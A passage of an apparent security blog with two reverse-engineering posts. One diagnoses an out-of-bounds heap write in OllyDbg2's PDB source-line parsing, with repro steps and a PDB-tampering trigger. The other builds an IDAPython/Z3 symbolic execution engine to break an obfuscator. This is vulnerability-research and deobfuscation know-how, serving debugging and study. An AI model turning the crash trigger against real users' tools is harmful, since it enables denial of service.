We got a debug message from the heap allocator informing us that the process has written outside of its heap buffer. The thing is, this message and the breakpoint are not triggered when the faulty write is done, but later, when another call to the allocator is made. At that moment, the allocator checks that the chunks are OK, and if it sees something weird, it outputs a message and breaks. The stack-trace should confirm that:
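To see why the report arrives late, here is a deliberately tiny Python model of tail checking. It is a toy, not how ntdll implements it: ToyHeap, the fill byte and the 8-byte tail are all assumptions made for the illustration. The point is only that the out-of-bounds write itself goes unnoticed, and the corruption is detected when the block is handed back to the allocator.

```python
TAIL_FILL = 0xAB  # arbitrary pattern written after the user bytes
TAIL_SIZE = 8     # arbitrary number of guard bytes


class ToyHeap(object):
    def __init__(self):
        self.blocks = {}
        self.next_handle = 0

    def alloc(self, size):
        # User bytes, followed by a tail filled with a known pattern.
        block = bytearray(size) + bytearray([TAIL_FILL] * TAIL_SIZE)
        handle = self.next_handle
        self.next_handle += 1
        self.blocks[handle] = (size, block)
        return handle

    def write(self, handle, offset, value):
        # No check against the requested size, like a raw pointer write.
        _, block = self.blocks[handle]
        block[offset] = value

    def free(self, handle):
        # The tail is only validated here, long after the faulty write.
        size, block = self.blocks.pop(handle)
        for i in range(size, size + TAIL_SIZE):
            if block[i] != TAIL_FILL:
                raise RuntimeError(
                    "block modified at offset %#x past requested size of %#x"
                    % (i, size)
                )


if __name__ == "__main__":
    heap = ToyHeap()
    chunk = heap.alloc(0x2D0)
    heap.write(chunk, 0x2D0, 0x41)  # one byte past the end: nothing happens yet
    try:
        heap.free(chunk)
    except RuntimeError as error:
        print("detected at free time:", error)
```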

0:000> k
ChildEBP RetAddr  
00189aec 76f757c2 ntdll!RtlpBreakPointHeap+0x23
00189b04 76f52a8a ntdll!RtlpCheckBusyBlockTail+0x171
00189b24 76f915cf ntdll!RtlpValidateHeapEntry+0x116
00189b6c 76f4ac29 ntdll!RtlDebugFreeHeap+0x9a
00189c60 76ef34a2 ntdll!RtlpFreeHeap+0x5d
00189c80 75d8537d ntdll!RtlFreeHeap+0x142
00189cc8 00403cfc KERNELBASE!GlobalFree+0x27
00189cd4 004cefc0 ollydbg!Memfree+0x3c
...

As we said just above, the message from the heap allocator was probably triggered when OllyDbg2 wanted to free a chunk of memory.

Basically, the problem with our issue is the fact we don't know:

  • where the heap chunk has been allocated
  • where the faulty write has been made

That's what makes our bug not trivial to debug without the suitable tools. If you want to have more information about debugging heap issues efficiently, you should definitely read the heap chapter in Advanced Windows Debugging (cheers `Ivan).

Pinpointing the heap issue: introducing full PageHeap

In a nutshell, the full PageHeap option is really powerful for diagnosing heap issues; here are at least two reasons why:

  • it will save where each heap chunk has been allocated
  • it will allocate a guard page at the end of our chunk (thus when the faulty write occurs, we might have a write access exception)

To do so, this option changes a bit how the allocator works (it adds more meta-data for each heap chunk, etc.); if you want more information, try at home allocating stuff with/without page heap and compare the allocated memory. Here is what a heap chunk looks like when full PageHeap is enabled:

heapchunk.gif
To enable it for ollydbg.exe, it's trivial. You just launch the gflags.exe binary (it's in WinDbg's directory) and tick the features you want to enable.

gflags.png
Now, you just have to relaunch your target in WinDbg, reproduce the bug and here is what I get now:
(f48.1140): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=000000b4 ebx=0f919abc ecx=0f00ed30 edx=00000b73 esi=00188694 edi=005d203c
eip=004ce769 esp=00187d60 ebp=00187d80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
ollydbg!Findfreehardbreakslot+0x21d9:
004ce769 891481          mov     dword ptr [ecx+eax*4],edx ds:002b:0f00f000=????????

Woot, this is very cool, because now we know exactly where something is going wrong. Let's get more information about the heap chunk now:

0:000> !heap -p -a ecx
    address 0f00ed30 found in
    _DPH_HEAP_ROOT @ 4f11000
    in busy allocation
    (  DPH_HEAP_BLOCK:  UserAddr  UserSize -  VirtAddr VirtSize)
              f6f1b2c:  f00ed30        2d0 -  f00e000  2000

    6e858e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    76f90d96 ntdll!RtlDebugAllocateHeap+0x00000030
    76f4af0d ntdll!RtlpAllocateHeap+0x000000c4
    76ef3cfe ntdll!RtlAllocateHeap+0x0000023a
    75d84e55 KERNELBASE!GlobalAlloc+0x0000006e
    00403bef ollydbg!Memalloc+0x00000033
    004ce5ec ollydbg!Findfreehardbreakslot+0x0000205c
    004cf1df ollydbg!Getsourceline+0x0000007f
    00479e1b ollydbg!Getactivetab+0x0000241b
    0047b341 ollydbg!Setcpu+0x000006e1
    004570f4 ollydbg!Checkfordebugevent+0x00003f38
    0040fc51 ollydbg!Setstatus+0x00006441
    004ef9ef ollydbg!Pluginshowoptions+0x0001214f

With this really handy command we got a lot of relevant information:

  • This chunk is 0x2d0 bytes long, so it spans 0xf00ed30 to 0xf00efff.
  • The faulty write now makes sense: the application tries to write 4 bytes right past the end of its heap buffer (an off-by-one on an array of unsigned ints, I guess).
  • The memory has been allocated through ollydbg!Memalloc (reached from ollydbg!Getsourceline, PDB related?). We will study that routine later in the post.
  • The faulty write occurs at address 0x4ce769.
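As a sanity check, the numbers from the !heap output and from the register dump can be put side by side. This is just a small sketch: the variable names are mine, and I'm assuming that the last page of the 0x2000-byte virtual region is the guard page, which is what the full PageHeap description above implies.

```python
PAGE_SIZE = 0x1000

# Values copied from the "!heap -p -a ecx" output.
user_addr, user_size = 0x0f00ed30, 0x2d0
virt_addr, virt_size = 0x0f00e000, 0x2000

user_end = user_addr + user_size                # first byte past the chunk
guard_page = virt_addr + virt_size - PAGE_SIZE  # assumption: the last page is the guard page

# Registers at the time of the fault: mov dword ptr [ecx+eax*4], edx
ecx, eax = 0x0f00ed30, 0xb4
fault_addr = ecx + eax * 4

print(hex(user_end), hex(guard_page), hex(fault_addr))
# prints: 0xf00f000 0xf00f000 0xf00f000
```

The chunk ends exactly where the guard page starts, so the very first byte written out of bounds lands on a non-accessible page and faults immediately.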

Looking inside OllyDbg2

We are kind of lucky: the routines involved in this bug are quite simple to reverse-engineer, and Hex-Rays works like a charm. Here is the C code (the interesting part at least) of the buggy function:

//ollydbg!buggy @ 0x004CE424
signed int buggy(struct_a1 *u)
{
  int file_size;
  unsigned int nbchar;
  unsigned __int8 *file_content;
  int nb_lines;
  int nb_lines2;

  // ...
  file_content = (unsigned __int8 *)Readfile(&u->sourcefile, 0, &file_size);
  // ...
  nbchar = 0;
  nb_lines = 0;
  while(nbchar < file_size)
  {
    // doing stuff to count all the char, and all the lines in the file
    // ...
  }

  u->mem1_ov = (unsigned int *)Memalloc(12 * (nb_lines + 1), 3);
  u->mem2 = Memalloc(8 * (nb_lines + 1), 3);
  if ( u->mem1_ov && u->mem2 )
  {
    nbchar = 0;
    nb_lines2 = 0;
    while ( nbchar < file_size && file_content[nbchar] )
    {
      u->mem1_ov[3 * nb_lines2] = nbchar;
      u->mem1_ov[3 * nb_lines2 + 1] = -1;
      if ( nbchar < file_size )
      {
        while ( file_content[nbchar] )
        {
            // Consume a line, increment stuff until finding a '\r' or '\n' sequence
            // ..
        }
      }
      ++nb_lines2;
    }
    // BOOM!
    u->mem1_ov[3 * nb_lines2] = nbchar;
    // ...
  }
}

So, let me explain what this routine does:

  • This routine is called by OllyDbg2 when it finds a PDB database for your binary and, more precisely, when it finds in this database the path to your application's source code. That kind of information is useful when you are debugging: OllyDbg2 is able to tell you which line of your C code you are currently at.

source.png
  • At line 10: "u->sourcefile" is a pointer to the path of your source code (found in the PDB database). The routine just reads the whole file, giving you its size and a pointer to the file content now stored in memory.
  • From line 12 to 18: we have a loop counting the total number of lines in your source code.
  • At line 20: we have the allocation of our chunk. It allocates 12*(nb_lines + 1) bytes. We saw previously in WinDbg that the size of the chunk was 0x2d0: it should mean we have exactly ((0x2d0 / 12) - 1) = 59 lines in our source code:

D:\TODO\crashes\odb2-OOB-write-heap>wc -l OOB-write-heap-OllyDbg2h-trigger.c
59 OOB-write-heap-OllyDbg2h-trigger.c

Good.

  • From line 24 to 39: we have a loop similar to the previous one. It's basically counting lines again and initializing the memory we just allocated with some information.
  • At line 41: we have our bug. Somehow, we can manage to get out of the loop with "nb_lines2 = nb_lines + 1". That means line 41 will try to write one cell outside of our buffer. In our case, if we have "nb_lines2 = 60" and our heap buffer starting at 0xf00ed30, it means we're going to try to write at (0xf00ed30 + 60*3*4) = 0xf00f000. That's exactly what we saw earlier.
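The index arithmetic behind that out-of-bounds write can be checked in a few lines of Python. This is only a sketch: the variable names are mine, and the values are copied from the wc output and the WinDbg register dump above.

```python
nb_lines = 59                  # from "wc -l" on the trigger source
cells = 3 * (nb_lines + 1)     # the chunk holds 12 * (nb_lines + 1) bytes, i.e. 180 dwords
alloc_bytes = 4 * cells
nb_lines2 = nb_lines + 1       # value of the counter when the second loop exits
bad_index = 3 * nb_lines2      # index used by the write after the loop
base = 0x0f00ed30              # ecx in the crash dump

print(hex(alloc_bytes), hex(bad_index), bad_index < cells, hex(base + 4 * bad_index))
# prints: 0x2d0 0xb4 False 0xf00f000
```

Valid indices run from 0 to 179, and the final write uses index 180, which is the 0xb4 sitting in eax when the access violation occurs.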

At this point, we have fully explained the bug. If you want to do some dynamic analysis in order to follow important routines, I've made several breakpoints, here they are:

bp 004CF1BF ".printf \"[Getsourceline] %mu\\n[Getsourceline] struct: 0x%x\", poi(esp + 4), eax ; .if(eax != 0){ .if(poi(eax + 0x218) == 0){ .printf \" field: 0x%x\\n\", poi(eax + 0x218); gc }; } .else { .printf \"\\n\\n\" ; gc; };"
bp 004CE5DD ".printf \"[buggy] Nbline: 0x%x \\n\", eax ; gc"
bp 004CE5E7 ".printf \"[buggy] Nbbytes to alloc: 0x%x \\n\", poi(esp) ; gc"
bp 004CE742 ".printf \"[buggy] NbChar: 0x%x / 0x%x - Idx: 0x%x\\n\", eax, poi(ebp - 1C), poi(ebp - 8) ; gc"
bp 004CE769 ".printf \"[buggy] mov [0x%x + 0x%x], 0x%x\\n\", ecx, eax * 4, edx"

In my environment, it gives me something like:

[Getsourceline] f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c
[Getsourceline] struct: 0x0
[...]
[Getsourceline] oob-write-heap-ollydbg2h-trigger.c
[Getsourceline] struct: 0xaf00238 field: 0x0
[buggy] Nbline: 0x3b 
[buggy] Nbbytes to alloc: 0x2d0 
[buggy] NbChar: 0x0 / 0xb73 - Idx: 0x0
[buggy] NbChar: 0x4 / 0xb73 - Idx: 0x1
[buggy] NbChar: 0x5a / 0xb73 - Idx: 0x2
[buggy] NbChar: 0xa4 / 0xb73 - Idx: 0x3
[buggy] NbChar: 0xee / 0xb73 - Idx: 0x4
[...]
[buggy] NbChar: 0xb73 / 0xb73 - Idx: 0x3c
[buggy] mov [0xb031d30 + 0x2d0], 0xb73

eax=000000b4 ebx=12dfed04 ecx=0b031d30 edx=00000b73 esi=00188694 edi=005d203c
eip=004ce769 esp=00187d60 ebp=00187d80 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
ollydbg!Findfreehardbreakslot+0x21d9:
004ce769 891481          mov     dword ptr [ecx+eax*4],edx ds:002b:0b032000=????????

Repro@home

  1. Download the latest version of OllyDbg2 here, extract the files
  2. Download the three files from odb2-oob-write-heap, put them in the same directory as ollydbg.exe
  3. Launch WinDbg and open the latest version of OllyDbg2
  4. Set your breakpoints (or not), F5 to launch
  5. Open the trigger in OllyDbg2
  6. Press F9 when the binary is fully loaded
  7. BOOM :). Note that you may not have a visible crash (remember, that's what made our bug not trivial to debug without full pageheap). Try to poke around with the debugger: restarting the binary or closing OllyDbg2 should be enough to get the message from the heap allocator in your debugger.

woot.png

Fun fact

You can even trigger the bug with only the binary and the PDB database. The trick is to tamper with the PDB, and more precisely with the place where it keeps the path to your source code. That way, when OllyDbg2 loads the PDB database, it reads that same database as if it were the source code of the application. Awesome.

fun.png

Conclusion

These kinds of crashes are always an occasion to learn new things. Either it's trivial to debug/repro and you won't waste much of your time, or it's not and you will improve your debugger/reverse-engineer-fu on a real example. So do it!

By the way, I doubt the bug is exploitable and I didn't even try to exploit it, but if you succeed I would be really glad to read your write-up! Even if we assume for a second that it is exploitable, you would still have to distribute the PDB file, the source file (I guess it would give you more control than the PDB) and the binary to your victim. So no big deal.

If you are too lazy to debug your crashes, send them to me, I may have a look at it!

Oh, I almost forgot: we are still looking for motivated contributors to write cool posts, spread the word.

Breaking Kryptonite's obfuscation: a static analysis approach relying on symbolic execution

Introduction

Kryptonite was a proof-of-concept I built to obfuscate code at the LLVM intermediate representation level. The idea was to use semantic-preserving transformations in order not to break the original program. One of the main ideas was, for example, to build a home-made 32-bit adder to replace the LLVM add instruction. Instead of having a single asm instruction generated at the end of the pipeline, you end up with a ton of assembly code doing only an addition. If you never read my article and you are interested in it, here it is: Obfuscation of steel: meet my Kryptonite.

home-made-adder.png

In this post I want to show you how we can break that obfuscation with symbolic execution. We are going to write a really tiny symbolic execution engine with IDAPython, and we will use Z3Py to simplify all our equations. Note that a friend of mine, @elvanderb, used a similar (though more generic) approach to simplify some parts of the crackme, but he didn't want to publish it, so here is my blog post about it!

The target

In this blogpost we are first going to work on the LLVM code emitted by llvm-cpp-frontend-home-made-32bits-adder.cpp. Long story short, the code uses the LLVM frontend API to emit a home made 32 bits adder in the LLVM intermediate language. You can then feed the output directly to clang to generate a real executable binary for your platform, I chose to work only on the x86 platform here. I've also uploaded the binary here: adder.

So if you open the generated binary in IDA, you will see an interminable routine that only does an addition. At first glance, it really is kind of scary:

  • every instruction seems to be important, there is no junk code
  • it seems that only binary operations are used: addition, left shift, right shift, xor, etc.
  • it's also a two-thousand-instruction routine

The idea in this post is to write a very basic symbolic execution engine in order to see what the EAX register holds at the end of the routine. Hopefully, we will obtain something highly simplified and more readable than this bunch of assembly code!

The symbolic execution engine approach

But in fact that piece of code makes it really easy for us to write a symbolic execution engine. Here are the main reasons:

  • there are no branches and no loops, perfect.
  • the instructions aren't playing with the EFLAGS register.
  • the instructions only use 32-bit registers (not 16-bit or 8-bit ones).
  • the number of unique instructions is really small: mov, shr, shl, and, xor, or, add.
  • the instructions used are easy to emulate.

Understand that we are really in a specific case here: the engine wouldn't be that easy to implement if it had to cover the most used x86 instructions, but we are lucky, we won't need that!

The engine is in fact a pseudo-emulator that propagates the different actions done by the asm instructions. Here is how our engine works:

  1. Each time a symbolic variable is found, you instantiate a Z3 BitVector and you keep it somewhere. A symbolic variable is basically a variable that the attacker can control. For example, in our case, we will have two symbolic variables: the two arguments passed to the function. We will see later an easy heuristic to find "automatically" the symbolic variables in our case.
  2. When you have an instruction, you emulate it and you update the CPU state of the engine. If it involves an equation, you update your set of equations.
  3. You do that until the end of the routine.

Of course, once the engine has run successfully, you may want to ask it some questions like "what does the EAX register hold at the end of the routine?". You want to have exactly all the operations needed to compute EAX. In our case, we hope to obtain "symbolic_variable1 + symbolic_variable2".

Here is a little example to sum up what we just said:

mov eax, [arg1]  ; at this moment we have our first symbolic variable
                    ; we push it in our equations list
mov edx, [arg2]  ; same thing here

shr eax, 2   ; EAX=sym1 >> 2
add eax, 1   ; EAX=(sym1 >> 2) + 1
shl eax, 1   ; EAX=((sym1 >> 2) + 1) << 1
and eax, 2   ; EAX=(((sym1 >> 2) + 1) << 1) & 2
inc edx      ; EDX=sym2 + 1
xor edx, eax ; EDX=(sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)
mov eax, edx ; EAX=(sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)

So at the end, you can ask the engine to give you the final state of EAX for example and it should give you something like:

EAX=(sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)
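The propagation above can be mimicked with a few lines of plain Python that build expression strings instead of Z3 objects. Take it as a sketch under my own assumptions, not as the engine of this post: the run function, the tuple encoding of instructions and the sym1/sym2 naming are made up for the illustration, inc is handled only because the example uses it, and the shl count is 1, matching the annotated expressions.

```python
def run(instructions):
    """Propagate expressions (plain strings) through a tiny register state."""
    regs = {}
    n_sym = 0
    binops = {'shr': '>>', 'shl': '<<', 'and': '&', 'xor': '^', 'add': '+'}
    for mnem, dst, src in instructions:
        if mnem == 'mov' and isinstance(src, str) and src.startswith('['):
            # Reading an argument: introduce a fresh symbolic variable.
            n_sym += 1
            regs[dst] = 'sym%d' % n_sym
        elif mnem == 'mov':
            # Register to register: the destination now holds the same expression.
            regs[dst] = regs[src]
        elif mnem == 'inc':
            regs[dst] = '(%s + 1)' % regs[dst]
        elif mnem in binops:
            # The source is either a register (use its expression) or a constant.
            rhs = regs[src] if src in regs else str(src)
            regs[dst] = '(%s %s %s)' % (regs[dst], binops[mnem], rhs)
        else:
            raise ValueError('unhandled instruction: %s' % mnem)
    return regs

program = [
    ('mov', 'eax', '[arg1]'),
    ('mov', 'edx', '[arg2]'),
    ('shr', 'eax', 2),
    ('add', 'eax', 1),
    ('shl', 'eax', 1),
    ('and', 'eax', 2),
    ('inc', 'edx', None),
    ('xor', 'edx', 'eax'),
    ('mov', 'eax', 'edx'),
]

final = run(program)['eax']
print('EAX=' + final)
# prints: EAX=((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2))
```

Apart from the extra pair of outer parentheses, this is the equation given above. Swapping the strings for Z3 bit-vectors is what turns such a toy into something you can simplify or solve.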

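With that equation you are free to use Z3Py either to simplify it or to find out how to get a specific value in EAX by controlling only the symbolic variables. (Note that Z3Py's >> on bit-vectors is an arithmetic shift, whereas x86's shr is a logical one, modelled by LShR ; it makes no difference for this particular expression, which only depends on bit 2 of sym1.)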

In [1]: from z3 import *
In [2]: sym1 = BitVec('sym1', 32)
In [3]: sym2 = BitVec('sym2', 32)

In [4]: simplify((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2))
Out[4]: 1 + sym2 ^ Concat(0, 1 + Extract(0, 0, sym1 >> 2), 0)

In [5]: solve((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2) == 0xdeadbeef)
[sym1 = 0, sym2 = 3735928556]

In [6]: solve((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2) == 0xdeadbeef, sym1 !=  0)
[sym1 = 1073741824, sym2 = 3735928556]

In [7]: sym1 = 1073741824
In [8]: sym2 = 3735928556

In [9]: hex((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2) & 0xffffffff)
Out[9]: '0xdeadbeefL'
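The two solutions returned by the solver can also be replayed with ordinary integers, without Z3. The helper below is a sketch of mine (the eax function name is hypothetical) ; unlike In [9], it applies the 32-bit mask to the whole expression, because Python integers are unbounded.

```python
MASK = 0xffffffff

def eax(sym1, sym2):
    # Same expression as above, truncated to 32 bits at the very end.
    return ((sym2 + 1) ^ ((((sym1 >> 2) + 1) << 1) & 2)) & MASK

print(hex(eax(0, 3735928556)))
print(hex(eax(1073741824, 3735928556)))
# both lines print: 0xdeadbeef
```

Both models give the same result because the only bit of sym1 that matters is bit 2, which is clear in 0 and in 1073741824 (0x40000000) alike.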

As you can imagine, that kind of tool is very valuable/handy when you do reverse-engineering tasks or bug-hunting. Unfortunately, our PoC won't be accurate/generic/complete enough to be used in "normal" cases, but never mind.

Let's code

To implement our little PoC we will use only IDAPython and Z3Py.

The disassembler

The first thing we have to do is to use IDA's API to get some information about the assembly instructions. The idea is just to get the mnemonic, the source and the destination operands easily ; here is the class I've designed for that purpose:

class Disassembler(object):
    '''A simple class to decode easily instruction in IDA'''
    def __init__(self, start, end):
        self.start = start
        self.end = end
        self.eip = start

    def _decode_instr(self):
        '''Returns mnemonic, dst, src'''
        mnem = GetMnem(self.eip)
        x = []
        for i in range(2):
            ty = GetOpType(self.eip, i)
            # cst
            if 5 <= ty <= 7:
                x.append(GetOperandValue(self.eip, i))
            else:
                x.append(GetOpnd(self.eip, i))

        return [mnem] + x

    def get_next_instruction(self):
        '''This is a convenient generator: you can iterate through
        each instruction easily'''
        while self.eip != self.end:
            yield self._decode_instr()
            self.eip += ItemSize(self.eip)

The symbolic execution engine

There are several important parts in our engine:

  1. the part which "emulates" the assembly instruction.
  2. the part which stores the different equations used through the routine. It is a simple Python dictionary: the key is a unique identifier, and the value is the equation
  3. the CPU state. We also use a dictionary for that purpose: the keys are the register names, and the values are what the registers hold at that specific moment. Note that we only store the unique identifier of the equation. In fact, our design is really similar to Jonathan's one in "Binary analysis: Concolic execution with Pin and z3", so please refer to his cool pictures if it's not really clear :P.
  4. the memory state ; in that dictionary we store memory references. Remember, if we find a non-initialized access to a memory area we instantiate a symbolic variable. That is our heuristic to find the symbolic variables automatically.
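Before the full PoC, here is a stripped-down sketch of how those dictionaries fit together. It is an illustration under my own assumptions: the State class, its method names and the operand strings such as "[ebp+arg_0]" are hypothetical, and equations are plain strings here where the PoC stores Z3 expressions.

```python
class State:
    def __init__(self):
        self.equations = {}      # equation id -> expression
        self.ctx = {}            # register name -> equation id
        self.mem = {}            # memory operand text -> equation id
        self.sym_variables = []  # names of the symbolic variables found so far

    def push(self, expr):
        """Store an expression and return its unique id."""
        idx = len(self.equations)
        self.equations[idx] = expr
        return idx

    def load(self, reg, operand):
        """mov reg, [mem]: an uninitialised location becomes a symbolic variable."""
        if operand not in self.mem:
            name = 'arg%d' % len(self.sym_variables)
            self.sym_variables.append(name)
            self.mem[operand] = self.push(name)
        self.ctx[reg] = self.mem[operand]

    def store(self, operand, reg):
        """mov [mem], reg: only the equation id is copied, not the expression."""
        self.mem[operand] = self.ctx[reg]

    def expr(self, reg):
        return self.equations[self.ctx[reg]]

s = State()
s.load('eax', '[ebp+arg_0]')                        # new symbolic variable arg0
s.ctx['eax'] = s.push('(%s << 1)' % s.expr('eax'))  # shl eax, 1
s.store('[ebp+var_4]', 'eax')
s.load('ecx', '[ebp+var_4]')                        # initialised slot: no new variable
s.load('edx', '[ebp+arg_4]')                        # new symbolic variable arg1
```

Registers and memory slots only ever hold ids, so copying a value around costs nothing and every intermediate equation stays available in one place.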

Here is the PoC code:

def prove(f):
    '''Taken from http://rise4fun.com/Z3Py/tutorialcontent/guide#h26'''
    s = Solver()
    s.add(Not(f))
    if s.check() == unsat:
        return True
    return False

class SymbolicExecutionEngine(object):
    '''The symbolic execution engine is the class that will
    handle the symbolic execution. It will keep a track of the 
    different equations encountered, and the CPU context at each point of the program.

    The symbolic variables have to be found by the user (or using data-tainting). This is not
    the purpose of this class.

    We are lucky, we only need to handle those operations & encodings:
        . mov:
            . mov reg32, reg32
            . mov reg32, [mem]
            . mov [mem], reg32
        . shr:
            . shr reg32, cst
        . shl:
            . shl reg32, cst
        . and:
            . and reg32, cst
            . and reg32, reg32
        . xor:
            . xor reg32, cst
        . or:
            . or reg32, reg32
        . add:
            . add reg32, reg32

    We also don't care about:
        . EFLAGS
        . branches
        . smaller registers (16/8 bits)
    Long story short: it's perfect ; that environment makes it really easy to play with symbolic execution.'''
    def __init__(self, start, end):
        # This is the CPU context at each time
        # The values of the registers are indices into the equations dictionary
        self.ctx = {
            'eax' : None,
            'ebx' : None,
            'ecx' : None,
            'edx' : None,
            'esi' : None,
            'edi' : None,
            'ebp' : None,
            'esp' : None,
            'eip' : None
        }

        # The address where the symbolic execution will start
        self.start = start

        # The address where the symbolic execution will stop
        self.end = end

        # Our disassembler
        self.disass = Disassembler(start, end)

        # This is the memory that can be used by the instructions to save temporary values/results
        self.mem = {}

        # Each equation must have a unique id
        self.idx = 0

        # The symbolic variables will be stored there
        self.sym_variables = []

        # Each equation will be stored here
        self.equations = {}

    def _check_if_reg32(self, r):
        '''XXX: make a decorator?'''
        return r.lower() in self.ctx

    def _push_equation(self, e):
        self.equations[self.idx] = e
        self.idx += 1
        return (self.idx - 1)

    def set_reg_with_equation(self, r, e):
        if self._check_if_reg32(r) == False:
            return

        self.ctx[r] = self._push_equation(e)

    def get_reg_equation(self, r):
        if self._check_if_reg32(r) == False:
            return

        return self.equations[self.ctx[r]]

    def run(self):
        '''Run from start address to end address the engine'''
        for mnemonic, dst, src in self.disass.get_next_instruction():
            if mnemonic == 'mov':
                # mov reg32, reg32
                if src in self.ctx and dst in self.ctx:
                    self.ctx[dst] = self.ctx[src]
                # mov reg32, [mem]
                elif (src.find('var_') != -1 or src.find('arg') != -1) and dst in self.ctx:
                    if src not in self.mem:
                        # A non-initialized location is trying to be read, we got a symbolic variable!
                        sym = BitVec('arg%d' % len(self.sym_variables), 32)
                        self.sym_variables.append(sym)
                        print 'Trying to read a non-initialized area, we got a new symbolic variable: %s' % sym
                        self.mem[src] = self._push_equation(sym)

                    self.ctx[dst] = self.mem[src]
                # mov [mem], reg32
                elif dst.find('var_') != -1 and src in self.ctx:
                    if dst not in self.mem:
                        self.mem[dst] = None

                    self.mem[dst] = self.ctx[src]
                else:
                    raise Exception('This encoding of "mov" is not handled.')
            elif mnemonic == 'shr':
                # shr reg32, cst
                if dst in self.ctx and type(src) == int:
                    self.set_reg_with_equation(dst, LShR(self.get_reg_equation(dst), src))
                else:
                    raise Exception('This encoding of "shr" is not handled.')
            elif mnemonic == 'shl':
                # shl reg32, cst
                if dst in self.ctx and type(src) == int:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) << src)
                else:
                    raise Exception('This encoding of "shl" is not handled.')
            elif mnemonic == 'and':
                x = None
                # and reg32, cst
                if type(src) == int:
                    x = src
                # and reg32, reg32
                elif src in self.ctx:
                    x = self.get_reg_equation(src)
                else:
                    raise Exception('This encoding of "and" is not handled.')

                self.set_reg_with_equation(dst, self.get_reg_equation(dst) & x)
            elif mnemonic == 'xor':
                # xor reg32, cst
                if dst in self.ctx and type(src) == int:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) ^ src)
                else:
                    raise Exception('This encoding of "xor" is not handled.')
            elif mnemonic == 'or':
                # or reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) | self.get_reg_equation(src))
                else:
                    raise Exception('This encoding of "or" is not handled.')
            elif mnemonic == 'add':
                # add reg32, reg32
                if dst in self.ctx and src in self.ctx:
                    self.set_reg_with_equation(dst, self.get_reg_equation(dst) + self.get_reg_equation(src))
                else:
                    raise Exception('This encoding of "add" is not handled.')
            else:
                print mnemonic, dst, src
                raise Exception('This instruction is not handled.')

    def get_reg_equation_simplified(self, reg):
        eq = self.get_reg_equation(reg)
        eq = simplify(eq)
        return eq

Testing

OK, we just have to instantiate the engine, giving it the start/end addresses of the routine, and ask it for the final equation held in EAX.

def main():
    '''Here we will try to attack the semantic-preserving obfuscations
    I talked about in "Obfuscation of steel: meet my Kryptonite." : http://0vercl0k.tuxfamily.org/bl0g/?p=260.

    The idea is to defeat those obfuscations using a tiny symbolic execution engine.'''
    sym = SymbolicExecutionEngine(0x804845A, 0x0804A17C)
    print 'Launching the engine..'
    sym.run()
    print 'Done, retrieving the equation in EAX, and simplifying..'
    eax = sym.get_reg_equation_simplified('eax')
    print 'EAX=%r' % eax
    return 1

if __name__ == '__main__':
    main()

And here is what I saw:

Launching the engine..
Trying to read a non-initialized area, we got a new symbolic variable: arg0
Trying to read a non-initialized area, we got a new symbolic variable: arg1
Done, retrieving the equation in EAX, and simplifying..
EAX=(~(Concat(2147483647, Extract(0, 0, arg1)) |
    Concat(2147483647, ~Extract(0, 0, arg0)) |
    4294967294) |
    ~(Concat(2147483647, ~Extract(0, 0, arg1)) |
    Concat(2147483647, Extract(0, 0, arg0)) |
    4294967294)) +
Concat(~(Concat(1073741823, Extract(1, 1, arg1)) |
            Concat(1073741823, ~Extract(1, 1, arg0)) |
            Concat(1073741823,
                ~(~Extract(0, 0, arg1) |
                    ~Extract(0, 0, arg0)))) |
        ~(Concat(1073741823, ~Extract(1, 1, arg1)) |
            Concat(1073741823, Extract(1, 1, arg0)) |
            Concat(1073741823,
                ~(~Extract(0, 0, arg1) |
                    ~Extract(0, 0, arg0)))) |
        ~(Concat(1073741823, Extract(1, 1, arg1)) |
            Concat(1073741823, Extract(1, 1, arg0)) |
            Concat(1073741823, ~Extract(0, 0, arg1)) |
            Concat(1073741823, ~Extract(0, 0, arg0)) |
            2147483646) |
        ~(Concat(1073741823, ~Extract(1, 1, arg1)) |
            Concat(1073741823, ~Extract(1, 1, arg0)) |
            Concat(1073741823, ~Extract(0, 0, arg1)) |
            Concat(1073741823, ~Extract(0, 0, arg0)) |
            2147483646),
        0) +
...

There were two possible explanations for this problem:

  • my code is wrong, and it generates equations that cannot be simplified.
  • my code is right, and Z3Py's simplify method has a hard time simplifying them.

To find out which one was right, I used the prove function shown earlier to check whether the equation was equivalent to a simple addition:

def main():
    '''Here we will try to attack the semantic-preserving obfuscations
    I talked about in "Obfuscation of steel: meet my Kryptonite." : http://0vercl0k.tuxfamily.org/bl0g/?p=260.

    The idea is to defeat those obfuscations using a tiny symbolic execution engine.'''
    sym = SymbolicExecutionEngine(0x804845A, 0x0804A17C)
    print 'Launching the engine..'
    sym.run()
    print 'Done, retrieving the equation in EAX, and simplifying..'
    eax = sym.get_reg_equation_simplified('eax')
    print prove(eax == Sum(sym.sym_variables))
    return 1

if __name__ == '__main__':
    main()

Fortunately for us, it printed True, so our code is correct. But it also means that the simplify function, as is at least, isn't able to simplify that bunch of equations involving bit-vector arithmetic. I still haven't found a clean way to make Z3Py simplify my big equation, so if someone knows how I can do that, please contact me. I've also exported the complete equation and uploaded it here ; you are free to give it a try like this.
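To give an intuition of what "proving equivalence" means, here is a brute-force stand-in for prove that works without Z3. Everything in it is an assumption of mine: bitwise_add is a textbook carry-propagation adder, not Kryptonite's actual one, and the check is exhaustive over 8-bit inputs only, whereas the solver reasons about all 32-bit inputs symbolically.

```python
from itertools import product

BITS = 8
MASK = (1 << BITS) - 1

def bitwise_add(a, b):
    """Addition built only from xor, and, and shift (carry propagation)."""
    while b:
        carry = (a & b) << 1
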